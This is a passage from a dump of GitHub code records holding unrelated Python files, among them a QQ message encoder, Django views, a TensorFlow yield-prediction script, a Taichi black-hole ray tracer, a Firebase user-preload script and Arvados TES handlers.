f\"[PQ:at,qq={self.uin},name={self.name}]\"\r\n\r\n def encode(self) -> bytes:\r\n stream = utils.Stream()\r\n name = \"@\" + self.name\r\n\r\n stream.write_hex(\"00 01 00 00\")\r\n stream.write_int16(len(name))\r\n stream.write_hex(\"00\")\r\n stream.write_int32(self.uin)\r\n stream.write_hex(\"00 00\")\r\n body = stream.read_all()\r\n\r\n name = name.encode()\r\n 
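# Editor's note (assumption): the writes above and below follow a tag-length-value\r\n # layout — a one-byte tag (0x01 for text, 0x06 for the at-payload), a two-byte\r\n # length, then the bytes — assuming utils.Stream.write_int16() emits the length\r\n # big-endian, as QQ's wire protocol conventionally does.\r\n 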
stream.write_byte(0x01)\r\n stream.write_int16(len(name))\r\n stream.write(name)\r\n stream.write_byte(0x06)\r\n stream.write_int16(len(body))\r\n stream.write(body)\r\n body = stream.read_all()\r\n\r\n stream.write_byte(0x01)\r\n stream.write_int16(len(body))\r\n stream.write(body)\r\n\r\n return stream.read_all()\r\n\r\n def from_raw(raw_data: bytes):\r\n stream = utils.Stream(raw_data)\r\n\r\n stream.del_left(1)\r\n name = stream.read_token().decode()[1:]\r\n\r\n stream.del_left(10)\r\n uin = stream.read_int32()\r\n\r\n return AtNode(uin, name)\r\n\r\n\r\n@dataclass\r\nclass FaceNode(BaseNode):\r\n id: int\r\n\r\n def format(self) -> str:\r\n return f\"[PQ:face,id={self.id}]\"\r\n\r\n def encode(self) -> bytes:\r\n stream = utils.Stream()\r\n\r\n stream.write_byte(0x02)\r\n stream.write_int16(1 + 3)\r\n stream.write_byte(0x01)\r\n stream.write_int16(1)\r\n stream.write_byte(self.id)\r\n\r\n return stream.read_all()\r\n\r\n def from_raw(raw_data: bytes):\r\n stream = utils.Stream(raw_data)\r\n face_id = stream.del_left(3).read_byte()\r\n\r\n return FaceNode(face_id)\r\n\r\n\r\n@dataclass\r\nclass ImageNode(BaseNode):\r\n hash: str\r\n\r\n def format(self) -> str:\r\n return f\"[PQ:image,url=https://gchat.qpic.cn/gchatpic_new/0/0-0-{self.hash}/0?term=3]\"\r\n\r\n def encode(self) -> bytes:\r\n return b''\r\n\r\n def from_raw(raw_data: bytes):\r\n stream = utils.Stream(raw_data)\r\n\r\n stream.del_left(1)\r\n uuid = stream.read_token().decode().strip(\" {}\")\r\n hash = uuid.replace(\"-\", \"\").upper()[:32]\r\n\r\n return ImageNode(hash)\r\n\r\n\r\nMessageNode = Union[TextNode, AtNode, FaceNode, ImageNode]\r\n\r\n\r\nclass Message:\r\n def __init__(self):\r\n self.__nodes: List[MessageNode] = []\r\n\r\n def add(self, node: MessageNode):\r\n if isinstance(node, TextNode):\r\n pass\r\n elif isinstance(node, AtNode):\r\n pass\r\n elif isinstance(node, FaceNode):\r\n pass\r\n elif isinstance(node, ImageNode):\r\n pass\r\n else:\r\n raise ValueError(\"the element added to Message is not one of the MessageNode types\")\r\n\r\n self.__nodes.append(node)\r\n return self\r\n\r\n def format(self):\r\n format = \"\"\r\n\r\n for node in self.__nodes:\r\n format += node.format()\r\n return format\r\n \r\n def encode(self):\r\n raw_data = b''\r\n for node in self.__nodes:\r\n raw_data += node.encode()\r\n return raw_data\r\n\r\n def from_raw(raw_data: bytes):\r\n message = Message()\r\n stream = utils.Stream(raw_data)\r\n\r\n while len(stream._raw) > 3:\r\n node_type = stream.read_byte()\r\n node_raw = stream.read_token()\r\n\r\n if node_type == 0x01: # text message\r\n message.add(TextNode.from_raw(node_raw))\r\n elif node_type == 0x02: # face (emoji) message\r\n message.add(FaceNode.from_raw(node_raw))\r\n elif node_type == 0x03: # group image message\r\n message.add(ImageNode.from_raw(node_raw))\r\n elif node_type == 0x06: # private-chat image message\r\n message.add(ImageNode.from_raw(node_raw))\r\n\r\n return message","repo_name":"DawnNights/py-pcqq","sub_path":"core/entities/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":5058,"program_lang":"python","lang":"en","doc_type":"code","stars":96,"dataset":"github-code","pt":"19"} +{"seq_id":"44387980969","text":"from datetime import date, datetime\nfrom django.shortcuts import redirect, render\nfrom psycopg2 import Date\nfrom django.contrib.auth.decorators import login_required\nfrom cobros.forms import registerCuotaForm,ReciboIngresoFormSet\nfrom .models import Cuota\nfrom gestionAsociados.models import ReciboIngreso\n\n# Create your views here.\ndef tableCuotas(request):\n cuotas = Cuota.objects.all()\n #form = 
registerCuotaForm()\n return render(request, \"createCuota.html\",{\"cuotas\":cuotas})\n\ndef RegistrarCuotas(request):\n tipo = request.POST['tipo']\n monto = request.POST['txtMonto']\n fecha_inicio = request.POST['txtFechaInicio']\n fecha_fin = request.POST['txtFechaFinal']\n cuota = Cuota.objects.create(tipo=tipo, monto=monto, fecha_inicio=fecha_inicio, fecha_fin=fecha_fin)\n return redirect(\"/Cuotas\")\n\n\n\"\"\"def EdicionCuotas(request, id):\n cuota = Cuota.objects.get(id=id)\n datos = {\n 'cuota':cuota\n }\n return render(request, \"editCuota.html\",datos)\n\n\ndef EditarCuotas(request):\n monto = request.POST['txtMonto']\n\n cuota = Cuota.objects.get(id=id)\n cuota.monto = monto\n cuota.save()\n\n return redirect('/Cuotas')\"\"\"\n\n\ndef EliminarCuotas(request, id):\n cuota = Cuota.objects.get(id=id)\n cuota.delete()\n return redirect(\"/Cuotas\")\n\n\ndef listaRecibos(request):\n if verificarRol('cajero',request.user):\n recibos = ReciboIngreso.objects.all()\n if request.method == 'POST':\n filtro = request.POST['filtro']\n print(filtro)\n if filtro == 'all':\n recibosFiltrados = ReciboIngreso.objects.all()\n else:\n recibosFiltrados = ReciboIngreso.objects.filter(cancelado=filtro)\n return render(request,'listaRecibos.html',{\"recibos\":recibosFiltrados})\n elif verificarRol('SOCIO',request.user):\n recibos = ReciboIngreso.objects.filter(aspirante = request.user)\n else:\n return redirect('/home')\n #recibosPendientes = recibos.filter(cancelado = False)\n return render(request,'listaRecibos.html',{\"recibos\":recibos,})\n\n@login_required\ndef cancelarReciboIngreso(request,id):\n recibo = ReciboIngreso.objects.get(id=id)\n recibo.cancelado = True\n recibo.save()\n return redirect('/gestionar_recibos')\n\ndef verificarRol(rolrequerido,user):\n if rolrequerido == user.role or rolrequerido.upper() == user.role:\n return True\n else:\n return False","repo_name":"AlexHernandezSV/Proyecto_G3_TOO115","sub_path":"cobros/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"24915181264","text":"import tensorflow as tf\nimport numpy as np\nimport pandas as pd\nimport os\n\ndef load_model(sess, model_path, meta_graph):\n saver = tf.train.import_meta_graph(os.path.join(model_path, meta_graph))\n saver.restore(sess, tf.train.latest_checkpoint(os.path.expanduser(model_path)))\n return tf.get_default_graph()\n\ndef get_relevant_nodes_from(graph):\n x = graph.get_tensor_by_name('x:0')\n keep_prob = graph.get_tensor_by_name('Placeholder_2:0')\n logits = graph.get_tensor_by_name('Squeeze:0')\n\n return x, keep_prob, logits\n\ndef predict_with_model(hists, model_path, meta_graph):\n with tf.Session() as sess:\n graph = load_model(sess, model_path, meta_graph)\n x, keep_prob, logits = get_relevant_nodes_from(graph)\n\n feed_dict = {x: hists, keep_prob: 1}\n return sess.run(logits, feed_dict=feed_dict)\n\nVAL_YEAR = 2013\nstates_to_keep = np.array([5, 17, 18, 19, 20, 27, 29, 31, 38, 39, 46])\n\nsoy_data = np.load(os.path.expanduser('~/cs231n-satellite-images-hist/data_soybean_filtered.npz'))\nhist_sums = np.sum(soy_data['output_image'],axis=(1,2,3))\nnonbroken_rows = hist_sums > 287\nimp_rows = pd.DataFrame(soy_data['output_index'])[0].isin(states_to_keep)\nval_year_rows = soy_data['output_year'] == VAL_YEAR\nindex_validate = np.logical_and.reduce((nonbroken_rows, imp_rows, val_year_rows))\n\nsoy_yield = soy_data['output_yield'][index_validate]\n\ncorn_data = 
np.load(os.path.expanduser('~/cs231n-satellite-images-hist/data_corn.npz'))\ncorn_yield = corn_data['output_yield'][index_validate]\n\n# Scaling Soy Predictions to Corn\ncorn_preds_w_soy_mod = predict_with_model(corn_data['output_image'][index_validate], os.path.expanduser('~/models/run1__dropout_0.50__soybean'), '2013CNN_model.ckpt.meta')\nstd_corn_preds = (corn_preds_w_soy_mod - np.mean(soy_yield))/np.std(soy_yield)\nunstd_corn_preds = std_corn_preds * np.std(corn_yield) + np.mean(corn_yield)\ncorn_rmse = np.sqrt(np.mean((unstd_corn_preds - corn_yield)**2))\nprint(corn_rmse)\n\n# Scaling Corn Predictions to Soy\nsoy_preds_w_corn_mod = predict_with_model(soy_data['output_image'][index_validate], os.path.expanduser('~/models/run2__dropout_0.50__corn'), 'important_counties2013CNN_model.ckpt.meta')\nstd_soy_preds = (soy_preds_w_corn_mod - np.mean(corn_yield))/np.std(corn_yield)\nunstd_soy_preds = std_soy_preds * np.std(soy_yield) + np.mean(soy_yield)\nsoy_rmse = np.sqrt(np.mean((unstd_soy_preds - soy_yield)**2))\nprint(soy_rmse)\n\n# writing out rescaled predictions\nnp.savez(os.path.expanduser('~/cs231n-satellite-images-models/output_rescaling/original_model_rescaled_oututs.npz'), soy_preds=soy_preds_w_corn_mod, corn_preds=corn_preds_w_soy_mod, soy_yield=soy_yield, corn_yield=corn_yield, locs=soy_data['output_index'][index_validate])\n","repo_name":"brad-ross/crop-yield-prediction-project","sub_path":"analysis/output_rescaling/output_rescaling.py","file_name":"output_rescaling.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"19"} +{"seq_id":"32468502108","text":"from taichi_glsl import *\n\nPI = 3.14159265\n\n\n@ti.data_oriented\nclass Ray:\n def __init__(self, origin, direction):\n self.origin = origin\n self.direction = direction\n\n @ti.func\n def update_euler(self):\n color = ti.Vector([0.0, 0.0, 0.0])\n origin = self.origin\n direction = self.direction.normalized()\n x = origin.normalized()\n y = direction.cross(x).normalized()\n z = x.cross(y)\n A_no = ti.Matrix.cols([x, y, z]) # coordinate transformation new -> old\n A_on = A_no.inverse() # coordinate transformation old -> new\n phi = 0.0\n dphi = 0.001\n\n dudphi = -ti.cos(ti.acos(x.dot(direction))) / (ti.sin(ti.acos(x.dot(direction))) * origin.norm())\n accre_l = (A_on @ y.cross(ti.Vector([0, 1, 0]))).normalized()\n accre_phi1 = atan(accre_l[2] / accre_l[0]) % (2 * PI)\n accre_phi2 = (atan(accre_l[2] / accre_l[0]) + PI) % (2 * PI)\n u = 1 / origin.norm()\n\n for i in range(10000):\n phi += dphi\n phi %= 2 * PI\n dudphi += - u * (1 - 3 / 2 * u ** 2) * dphi\n u += dudphi * dphi\n r = 1/u\n if r > 500:\n break\n if r < 0.01:\n break\n if (phi - accre_phi1) * (phi - dphi - accre_phi1) <= 0 or (phi - accre_phi2) * (phi - dphi - accre_phi2) <= 0:\n # add the mapping to the accretion disk\n if 2.5 < r < 5:\n color += ti.Vector([1/(exp((r-4.9)/0.03)+1), 2/(exp((r-5)/0.3)+1)-1, -(r+3)**3*(r-5)/432])\n return color\n\n\n@ti.data_oriented\nclass Camera:\n def __init__(self, fov=60, aspect_ratio=16/9):\n # Camera parameters\n self.lookfrom = ti.Vector.field(3, dtype=ti.f32, shape=())\n self.lookat = ti.Vector.field(3, dtype=ti.f32, shape=())\n self.vup = ti.Vector.field(3, dtype=ti.f32, shape=())\n self.fov = fov\n self.aspect_ratio = aspect_ratio\n\n self.cam_lower_left_corner = ti.Vector.field(3, dtype=ti.f32, shape=())\n self.cam_horizontal = ti.Vector.field(3, dtype=ti.f32, shape=())\n self.cam_vertical = ti.Vector.field(3, dtype=ti.f32, shape=())\n 
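# Editor's note: shape=() declares 0-dimensional Taichi fields, i.e. single\n # device-side values that host and kernel code read and write via field[None].\n 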
self.cam_origin = ti.Vector.field(3, dtype=ti.f32, shape=())\n self.reset()\n\n @ti.kernel\n def reset(self):\n self.lookfrom[None] = [5.0, 1.0, 0.0]\n self.lookat[None] = [2.0, 0.0, -3.0]\n self.vup[None] = [0.0, 1.0, 0.0]\n theta = self.fov * (PI / 180.0)\n half_height = ti.tan(theta / 2.0)\n half_width = self.aspect_ratio * half_height\n self.cam_origin[None] = self.lookfrom[None]\n w = (self.lookfrom[None] - self.lookat[None]).normalized()\n u = (self.vup[None].cross(w)).normalized()\n v = w.cross(u)\n self.cam_lower_left_corner[None] = ti.Vector([-half_width, -half_height, -1.0])\n self.cam_lower_left_corner[\n None] = self.cam_origin[None] - half_width * u - half_height * v - w\n self.cam_horizontal[None] = 2 * half_width * u\n self.cam_vertical[None] = 2 * half_height * v\n\n @ti.kernel\n def reset_after_move(self):\n self.cam_origin[None] = self.lookfrom[None]\n w = (self.lookfrom[None] - self.lookat[None]).normalized()\n u = (self.vup[None].cross(w)).normalized()\n v = w.cross(u)\n theta = self.fov * (PI / 180.0)\n half_height = ti.tan(theta / 2.0)\n half_width = self.aspect_ratio * half_height\n self.cam_lower_left_corner[None] = ti.Vector([-half_width, -half_height, -1.0])\n self.cam_lower_left_corner[\n None] = self.cam_origin[None] - half_width * u - half_height * v - w\n self.cam_horizontal[None] = 2 * half_width * u\n self.cam_vertical[None] = 2 * half_height * v\n\n def rot_z(self, t):\n self.lookfrom[None][0] = 9.0 * cos(t/100)\n self.lookfrom[None][1] = 9.0 * sin(t/100)\n self.reset_after_move()\n\n @ti.func\n def get_ray(self, u, v):\n return Ray(self.cam_origin[None],\n self.cam_lower_left_corner[None] + u * self.cam_horizontal[None] + v * self.cam_vertical[None] -\n self.cam_origin[None])\n","repo_name":"theAfish/BlackHoleRayMarching","sub_path":"gr_ray_tracing_model.py","file_name":"gr_ray_tracing_model.py","file_ext":"py","file_size_in_byte":4193,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"19"} +{"seq_id":"7060860403","text":"from flask import json\nfrom flask_login import current_user\nfrom flask_sse import ServerSentEventsBlueprint, Message\n\nfrom app import app\nfrom models import SSEChannel\n\n\nclass SSE(ServerSentEventsBlueprint):\n def messages(self, channel='sse'):\n \"\"\"\n Generate an infinite stream of messages from the given Redis channel\n\n This method creates a new Redis pubsub connection and stores its\n ID back into the application's database. 
This is used on client\n disconnect to clean up lingering connections.\n \"\"\"\n redis = self.redis\n SSEChannel.create(user_id=current_user.id, sse_id=redis.client_id())\n pubsub = redis.pubsub()\n pubsub.subscribe(channel)\n for pubsub_message in pubsub.listen():\n if pubsub_message['type'] == 'message':\n msg_dict = json.loads(pubsub_message['data'])\n yield Message(**msg_dict)\n\n\nsse = SSE('sse', __name__)\nsse.add_url_rule(rule=\"\", endpoint=\"stream\", view_func=sse.stream)\napp.register_blueprint(sse, url_prefix=\"/stream\")\n","repo_name":"mattdaviscodes/home-game-poker","sub_path":"sse.py","file_name":"sse.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"13431256364","text":"import os\nimport numpy as np\n\nfrom compas.datastructures import Mesh\nfrom compas.datastructures import mesh_explode\n\n# ==============================================================================\n# File\n# ==============================================================================\nHERE = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))\nfolder_name = 'plate'\nFILE_FOLDER = os.path.join(HERE, 'data', folder_name)\n\n# ==============================================================================\n# Output\n# ==============================================================================\ncounter = 0\nfor i, filename in enumerate(os.listdir(FILE_FOLDER)):\n if filename.endswith(\".obj\"):\n FILE_I = os.path.join(FILE_FOLDER, filename)\n if \"shard\" in filename: \n mesh = Mesh.from_obj(FILE_I)\n\n # explode joined meshes\n exploded_meshes = mesh_explode(mesh)\n print(i, filename)\n for ex_mesh in exploded_meshes:\n FILE_O = os.path.join(FILE_FOLDER, '%s_%s.npy' % (folder_name, counter))\n # delete tiny pieces\n if len(list(ex_mesh.vertices())) < 100:\n continue\n \n vertices = np.array([ex_mesh.vertex_coordinates(vkey) for vkey in ex_mesh.vertices()])\n normals = np.array([ex_mesh.vertex_normal(vkey) for vkey in ex_mesh.vertices()])\n\n datas = np.concatenate((vertices, normals), axis=1)\n print(np.shape(datas))\n np.save(FILE_O, datas)\n\n counter += 1\n\n else:\n os.remove(FILE_I)\n\n elif filename.endswith(\".mtl\"):\n FILE_E = os.path.join(FILE_FOLDER, filename)\n os.remove(FILE_E)\n\n\n\n\n\n","repo_name":"duchaoyu/3d_fracture_reassmbly","sub_path":"data_processing/040_npy_output.py","file_name":"040_npy_output.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"34962522082","text":"import product\nimport customer\nimport order\n\n\nif __name__ == '__main__':\n try:\n battery_1 = product.Product('battery ABP7-12L', 776, '12v 7Ah AGM', '156 x 94 x 65')\n battery_2 = product.Product('battery AGM LPM 6V - 12 Ah', 658, '6v 12Ah AGM', '151 x 96 x 50')\n battery_3 = product.Product('battery LP1212', 1798, '12v 12Ah gel', '151 x 98 x 95')\n battery_4 = product.Product('battery GEL 12-12A-BS', 1290, '12v 10Ah gel', '150 x 87 x 106')\n\n customer_1 = customer.Customer('Petrenko', 'Petro', '+380123123123', 'Kyiv')\n order_1 = order.Order('No 0001', customer_1)\n order_1.add_product(battery_1, battery_1.price, quantity=2)\n order_1.add_product(battery_4, battery_4.price)\n order_1.add_product(battery_2, battery_2.price)\n\n except (TypeError, ValueError) as error:\n print(error)\n\n print(order_1, \"\\n\")\n\n try:\n print(f\"{order_1[battery_2][0]} - {order_1[battery_1][1]} 
pcs\\n\")\n\n for items in order_1:\n product, quantity = (*items,)\n print(f\"{product} - {quantity} pcs\")\n\n print(f\"{order_1[battery_3][0]} - {order_1[battery_1][1]} pcs\")\n\n except KeyError as error:\n print(error)\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Geksapod/OOP_Homework_01","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21123147343","text":"\"\"\"\r\nWrite a Python program to sum of three given integers. However, if two values are equal sum will be zero\r\n\"\"\"\r\n\r\ndef sumof(a,b,c):\r\n if(a==b or a==c or b==c):\r\n return 0\r\n else:\r\n return a+b+c\r\n \r\n \r\na,b,c=input(\"enetr 3 numbers with comma seperated:\\n\").split(\",\")\r\n\r\nprint(sumof(int(a),int(b),int(c)))","repo_name":"sanjeevseera/Python-Practice","sub_path":"Basic_Programs/Part2/P033_sum.py","file_name":"P033_sum.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35637526643","text":"#(Version 2 -- Currently Used)\n#File that preloads database with user and session documents from a \"users.csv\" file\n#outputs an added_users.csv file with each user's name and their login username\n\n\n#Needs firebase package to be installed\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import firestore\nimport uuid\nimport csv\nimport random\n\n# Use the application default credentials\ncred = credentials.Certificate(\n \"../../../pinmi-59c77-firebase-adminsdk-z692d-955bbf0b26.json\")\nfirebase_admin.initialize_app(cred)\n\n\ndb = firestore.client()\n\n\nudict = {}\n\ninput_file = csv.DictReader(open(\"users.csv\"))\noutput_file = open('added_users.csv', 'w', newline='')\nfieldnames = input_file.fieldnames + ['username']\ncsvwriter = csv.DictWriter(output_file, fieldnames)\ncsvwriter.writeheader()\n\nfor row in input_file:\n # Generate first and last name\n name = row[\"Name\"].split()\n if(len(name) > 1):\n fname = name[0]\n lname = name[1]\n else:\n fname = \"\"\n lname = \"\"\n #get username\n username = row[\"Pin-MI Login Name\"]\n # check if userid already exists (user is already existent)\n userid = \"\"\n doc = db.collection(u'users').document(username).get()\n if(doc.exists):\n userid = doc.to_dict().get('userID')\n print(\"User: \" + username + \" already exists\")\n else:\n userid = uuid.uuid4().hex\n print(\"User: \" + username + \" is new\")\n # assign role\n trole = row[\"Role (Therapist/Client)\"]\n role = \"\"\n if(trole == \"Therapist\"):\n role = \"caller\"\n else:\n role = \"callee\"\n # create dictionary key-obj entry\n udict[username] = {\"first\": fname, \"last\": lname, \"userID\": userid,\n \"username\": username, \"sessionid\": \"\", \"role\": role}\n # printing for confirmation\n user = udict[username]\n print(\"first: \" + user['first'] + \" last: \" + user['last'] +\n \" userid: \" + user['userID'] + \" curSession: \" + user['sessionid'])\ninput_file = csv.DictReader(open(\"users.csv\"))\n\nnumPairs = len(list(input_file)) // 2\n\nfor x in range(1, numPairs):\n # for each pair, create a sessionid (based off of current login format)\n sessionid = uuid.uuid4().hex\n partner1 = str(x) + 'a'\n partner2 = str(x) + 'b'\n udict[partner1][\"sessionid\"] = sessionid\n udict[partner2][\"sessionid\"] = sessionid\n\n if(udict[partner1][\"role\"] == \"caller\"):\n caller = udict[partner1]\n callee = udict[partner2]\n 
else:\n caller = udict[partner2]\n callee = udict[partner1]\n print(\"caller id: \" + caller[\"userID\"] + \" callee id: \" + callee[\"userID\"])\n # create the session doc\n doc_ref = db.collection(u'sessions').document(sessionid)\n doc_ref.set({\n u'caller_id': caller['userID'],\n u'callee_id': callee['userID'],\n u'media_url': u'default',\n u'duration': u'0',\n })\n\nfor uN in udict:\n user = udict[uN]\n #create user document for each user in udict\n doc_ref = db.collection(u'users').document(user['username'])\n doc_ref.set({\n u'first': user['first'],\n u'last': user['last'],\n u'userID': user['userID'],\n u'curSession': user['sessionid']\n })\n print(user['username'] + \" added\")\n","repo_name":"CoExLab/pinmi","sub_path":"src/other/database/setSessions.py","file_name":"setSessions.py","file_ext":"py","file_size_in_byte":3225,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"13698007596","text":"from django.core.files.uploadedfile import InMemoryUploadedFile\ntry:\n from cStringIO import StringIO as BytesIO\nexcept ImportError:\n from io import BytesIO\nfrom django.core.cache import caches\ncache = caches['default']\n\n\nclass FileCache:\n \"\"\"\n Cache file data and retain the file after failed validation\n \"\"\"\n timeout = 1000\n\n def __init__(self):\n self.cache = cache\n\n def set(self, key, upload):\n \"\"\"\n Set file data to cache for 1000s\n :param key: cache key\n :param upload: file data\n \"\"\"\n try:\n state = {\n \"name\": upload.name,\n \"size\": upload.size,\n \"content_type\": upload.content_type,\n \"charset\": upload.charset,\n \"content\": upload.file.read()}\n upload.file.seek(0)\n self.cache.set(key, state, self.timeout)\n except AttributeError:\n pass\n\n def get(self, key):\n \"\"\"\n Get the file data from cache using specific cache key\n :param key: cache key\n :return: File data\n \"\"\"\n upload = None\n state = self.cache.get(key)\n if state:\n f = BytesIO()\n f.write(state[\"content\"])\n upload = InMemoryUploadedFile(\n file=f,\n field_name='file',\n name=state[\"name\"],\n content_type=state[\"content_type\"],\n size=state[\"size\"],\n charset=state[\"charset\"],\n )\n upload.file.seek(0)\n return upload\n\n def delete(self, key):\n \"\"\"\n Delete file data from cache\n :param key: cache key\n \"\"\"\n self.cache.delete(key)\n","repo_name":"MaistrenkoAnton/filefield-cache","sub_path":"filefield_cache/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"16679211337","text":"import json\nimport urllib.parse\nimport arvados\nimport arvados.commands.keepdocker\n\ndef GetServiceInfo():\n return {\n \"id\": \"\",\n \"name\": \"\",\n \"type\": \"\",\n \"description\": \"\",\n \"organization\": {\n },\n \"contactUrl\": \"\",\n \"documentationUrl\": \"\",\n \"createdAt\": \"\",\n \"updatedAt\": \"\",\n \"environment\": \"\",\n \"version\": \"\",\n \"storage\": [],\n \"tesResources_backend_parameters\": []\n }\n\ndef ListTasks():\n return {\"tasks\": []}\n\ndef CreateTask(body):\n print(json.dumps(body, indent=2))\n\n mounts = {}\n\n for inp in body[\"inputs\"]:\n u = urllib.parse.urlparse(inp[\"url\"])\n print(u)\n\n mounts[inp[\"path\"]] = {\n \"kind\": \"collection\",\n \"uuid\": u.netloc,\n \"path\": u.path\n }\n\n # \"url\": \"s3://ce8i5-4zz18-nrm9u73cqjdz4rq/whale.txt\",\n # \"path\": \"/var/lib/cwl/stgb7fd4415-e640-4bc5-9f53-e0e32e8502a3/whale.txt\",\n # 
\"type\": \"FILE\",\n # \"name\": \"input\",\n # \"description\": \"cwl_input:input\"\n\n mounts[body[\"executors\"][0][\"workdir\"]] = {\n \"kind\": \"tmp\",\n \"capacity\": int(body[\"resources\"][\"disk_gb\"] * 1024*1024*1024)\n }\n\n image_name, image_tag = body[\"executors\"][0][\"image\"].split(\":\")\n\n api = arvados.api()\n\n images = arvados.commands.keepdocker.list_images_in_arv(api, 3,\n image_name=image_name,\n image_tag=image_tag)\n\n container_request = {\n \"state\": \"Committed\",\n \"mounts\": mounts,\n \"runtime_constraints\": {\n \"vcpus\": body[\"resources\"][\"cpu_cores\"],\n \"ram\": int(body[\"resources\"][\"ram_gb\"] * 1024*1024*1024)\n },\n \"container_image\": api.collections().get(uuid=images[0][0]).execute()[\"portable_data_hash\"],\n \"command\": body[\"executors\"][0][\"command\"],\n \"output_path\": body[\"executors\"][0][\"workdir\"],\n \"priority\": 500\n }\n\n print(json.dumps(container_request, indent=2))\n\n cr = api.container_requests().create(body={\"container_request\": container_request}).execute()\n\n return {\"id\": cr[\"uuid\"]}\n\ndef GetTask(id):\n api = arvados.api()\n cr = api.container_requests().get(uuid=id).execute()\n con = api.containers().get(uuid=cr[\"container_uuid\"]).execute()\n\n state = \"\"\n\n if con[\"state\"] == \"Queued\":\n state = \"QUEUED\"\n\n if con[\"state\"] == \"Locked\":\n state = \"INITIALIZING\"\n\n if con[\"state\"] == \"Running\":\n state = \"RUNNING\"\n\n if cr[\"state\"] == \"Final\":\n if con[\"state\"] == \"Complete\":\n state = \"COMPLETE\"\n else:\n state = \"EXECUTOR_ERROR\"\n\n return {\"id\": id, \"state\": state}\n\ndef CancelTask(id):\n print(\"canceling\", id)\n return {\"id\": id}\n","repo_name":"arvados/arvados-tes","sub_path":"arvados_tes/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"2122596516","text":"\n# def input_name(name):\n# if name == \"sajjad\":\n# raise Exception(\"sorry this name is not valid for log in !!\") # if we want to raise an Error exception ourselves inside the code\n \n# # input_name('sajjad') \n\n# try:\n# input_name(\"sajjad\")\n# except:\n# print(\"the input_name function has a problem\")\n\n\ntry:\n lname = ansaryan\nexcept NameError:\n print(\"sajjad\")\n \n\n","repo_name":"abolbdh/sajjad_ansaryan","sub_path":"21/02-raise.py","file_name":"02-raise.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"69848115953","text":"# -*- coding: UTF-8 -*-\n\nimport os\n\nfrom django.http import Http404\nfrom django.shortcuts import redirect\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import HttpResponse\nfrom wsgiref.util import FileWrapper\n\nfrom m_common import *\n\n__copyright__ = 'Copyright (c) 2016 The University of Texas at Austin'\n__author__ = 'mccookpv'\n\n\ndef download_adhoc_zip(request):\n \"\"\"\n Download the Nanosourcer ad-hoc query results as a zip compressed file.\n \"\"\"\n\n logger_main.info('download_adhoc_zip check 001')\n\n zipfile = \"{0}/db/ddl/queries/nanosourcer_csv.zip\".format(settings.BASE_DIR)\n logger_main.info('download_adhoc_zip check 002')\n\n context_vars = {}\n\n if not os.path.exists(zipfile):\n context_vars['err_title'] = 'No zip file exists.'\n context_vars['err_message'] = 'No zip file was found.'\n response = render_to_response('lobby/lti_error.html',\n context_vars,\n 
context_instance=RequestContext(request),\n )\n set_response_meta_nocache(response)\n return response\n\n logger_main.info('zipfile {0}'.format(zipfile))\n\n zf = open(zipfile, \"rb\")\n\n response = HttpResponse(FileWrapper(zf), content_type='application/zip')\n logger_main.info('download_adhoc_zip check 003')\n response['Content-Disposition'] = 'attachment; filename=nanosourcer_csv.zip'\n logger_main.info('download_adhoc_zip check 004')\n return response\n\ndef queryzip(request,\n config_key=None):\n\n # NOTE (editor): the original set literal {'lti_session_key'} cannot work as a\n # template context; a dict mapping the key to the session value is the likely intent.\n context_vars = {'lti_session_key': request.session.get('lti_session_key')}\n\n response = render_to_response('temp_query_zip_download.html',\n context_vars,\n context_instance=RequestContext(request),\n )\n set_response_meta_nocache(response)\n return response\n\n@csrf_exempt\ndef assignment_lti_config(request, config_key=None):\n\n context_vars = {} # NOTE (editor): context_vars was referenced here without being defined\n\n response = render_to_response(\"config/assignment.xml\",\n context_vars,\n content_type=\"application/xml; charset=utf-8\",\n context_instance=RequestContext(request))\n\n\n set_response_meta_nocache(response)\n\n return response\n\n@csrf_exempt\ndef nav_lti_config(request,\n config_key=None):\n \"\"\"\n Returns a prepared LTI XML configuration file to the LMS LTI app installation.\n\n https:///\n https:///config/main\n \"\"\"\n\n if not config_key:\n config_key = \"main\"\n\n config_root = \"{0}/templates/config\".format(settings.PROJECT_ROOT)\n\n path = \"{0}/{1}.xml\".format(config_root,\n config_key)\n\n if not os.path.exists(path):\n raise Http404()\n\n app_url = request.build_absolute_uri('/')\n\n context_vars = dict()\n context_vars['entry_root_url'] = app_url\n context_vars['server_env'] = settings.SERVER_ENV\n\n response = render_to_response(\"config/{0}.xml\".format(config_key),\n context_vars,\n content_type=\"application/xml; charset=utf-8\",\n context_instance=RequestContext(request))\n\n set_response_meta_nocache(response)\n\n return response\n\n\n@csrf_exempt\ndef nav_main(request):\n\n p = \"nav_main\"\n\n context_vars = {}\n\n lti_session_key = request.session.get('lti_session_key', None)\n\n # is_launch = request.session.get('is_launch')\n #\n # if 